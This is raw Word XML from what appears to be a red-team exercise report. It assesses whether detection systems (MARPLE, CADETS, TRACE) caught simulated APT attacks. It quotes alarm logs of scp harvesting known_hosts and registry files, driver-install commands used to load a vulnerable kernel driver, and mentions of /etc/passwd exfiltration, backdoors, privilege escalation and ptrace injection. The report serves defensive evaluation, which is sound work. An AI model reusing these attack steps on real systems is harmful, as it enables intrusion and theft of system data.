    <w:p w14:paraId="07AC325D" w14:textId="21FC73AA" w:rsidR="00FE6381" w:rsidRPr="00D5795A" w:rsidRDefault="00D5795A" w:rsidP="00D5795A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20190510</w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5D-2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC02E01" w14:textId="77777777" w:rsidR="00795BC9" w:rsidRPr="00D5795A" w:rsidRDefault="00FE6381" w:rsidP="00D5795A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"sshd" which communicates with different IPs (128.55.12.66, 128.55.12.122, 128.55.12.51, ..) clones a "scp". This scp writes (creates) hundreds of files. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414DFEA" w14:textId="2F5664A3" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00795BC9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19-05-10 03:38:26.71: Alarm: CDL: Write: 000: Object 835986 (\Device\HarddiskVolume2\Windows\Temp\Pictures\</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1972B7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">www.army.mil.nz.docx) </w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject 119657 pid=680 C:\Program Files\OpenSSH- Win64\scp" -r -t </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF14CF" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00795BC9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig.4 5D-2-20190510-scp-2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E2C55" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="00D5795A" w:rsidRDefault="00FE6381" w:rsidP="00D5795A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scp from fiveDirections2 writes to ta1-marple1 (128.55.12.66) : Scp gathers the following information : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62677844" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="00D5795A" w:rsidRDefault="00FE6381" w:rsidP="00795BC9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1- \Device\HarddiskVolume2\USERS\ADMIN\.SSH\KNOWN_HOSTS 2-\Device\HarddiskVolume2\WINDOWS\SYSTEM32\DRIVERS\ETC\SERVICES 3- Reading from IP : 128.55.12.66</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4- bunch of Registry files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A893F1" w14:textId="0EDFFE52" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00FE6381">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Once again on the 16</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00770E99">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> they detected benign activity with </w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>the setup of filemon.inf.</w:t>
      </w:r>
      <w:r w:rsidR="00770E99">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  This activity is expected to be seen as installing a kernel driver is a noisy procedure.  As such, we were looking for reported use of the vulnerability in the driver by the APT process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40419E" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="00D5795A" w:rsidRDefault="00FE6381" w:rsidP="00795BC9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Around 11AM, someone tried to install a driver `C:\WINDOWS\System32\InfDefaultInstall.exe C:\Windows\System32\drivers\filemon.inf` and start it with `sc start filemon`. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F6D21" w14:textId="77777777" w:rsidR="000C59A4" w:rsidRDefault="000C59A4" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB2F97A" w14:textId="05BEB6B4" w:rsidR="000C59A4" w:rsidRPr="000112FB" w:rsidRDefault="000C59A4" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290F01F8" w14:textId="43D8E114" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00141067" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc12600162"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:t>CADETS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="442E010E" w14:textId="4F57EA60" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There was no real time reporting for CADETS during the engagement.  MARPLE was able to identify the Nginx Drakon APT forensically post </w:t>
      </w:r>
      <w:r w:rsidR="00005FC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>exercise.  In both attacks, MARPLE and CADETS successfully reported the stage1Loader and OC2 IP addresses and ports along with the exfil of /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3843DBFA" w14:textId="77777777" w:rsidR="00365694" w:rsidRPr="000112FB" w:rsidRDefault="00365694" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13782928" w14:textId="77777777" w:rsidR="00B87C44" w:rsidRDefault="00821808" w:rsidP="00B87C44">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51D5CD1A" wp14:editId="08C5F47A">
            <wp:extent cx="6128426" cy="1719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27 at 10.22.30 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6128426" cy="1719143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA629A4" w14:textId="25C2A743" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00B87C44" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-CADETS attack with Nginx backdoor and Drakon APT on host 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F713225" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33739F69" w14:textId="77777777" w:rsidR="00B87C44" w:rsidRDefault="00821808" w:rsidP="00B87C44">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D14C135" wp14:editId="15B63824">
            <wp:extent cx="6139334" cy="151097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27 at 10.23.54 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6143014" cy="1511882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="636139DA" w14:textId="5E427A9A" w:rsidR="00821808" w:rsidRDefault="00B87C44" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B87C44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MARPLE-CADETS attack with Nginx backdoor and Drakon APT on host 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FF59DB" w14:textId="77777777" w:rsidR="00E97B0E" w:rsidRPr="000112FB" w:rsidRDefault="00E97B0E" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094426F7" w14:textId="6600B2D1" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00141067" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="_Toc12600163"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:t>TRACE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w14:paraId="369494DF" w14:textId="77777777" w:rsidR="00E97B0E" w:rsidRDefault="00E97B0E" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Drakon APT attack along with privilege escalation, process injection, and data exfil all went unreported.  This included new capabilities for privilege escalation (binfmt elevate method) and process injection (inject2 using ptrace).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E4DFE" w14:textId="77777777" w:rsidR="00E97B0E" w:rsidRDefault="00E97B0E" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E85651" w14:textId="4FDA17F1" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00E97B0E" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>On the other hand, o</w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>n Friday May 17 MARPLE reported in real time the attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>both TRACE hosts trying but failing to use Azazel APT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732F5DD" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D747E32" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mdnhossain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A0F18" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1D7C6" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027F886C" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>On trace-2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A14144" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19-05-17 09:05:20.28: Alarm: FileCorruption: Object 18788695 (/home/admin/libselinux.so) Subject 7059275 pid=4509 bash -c scp -t .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251CA16" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C28CA1" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
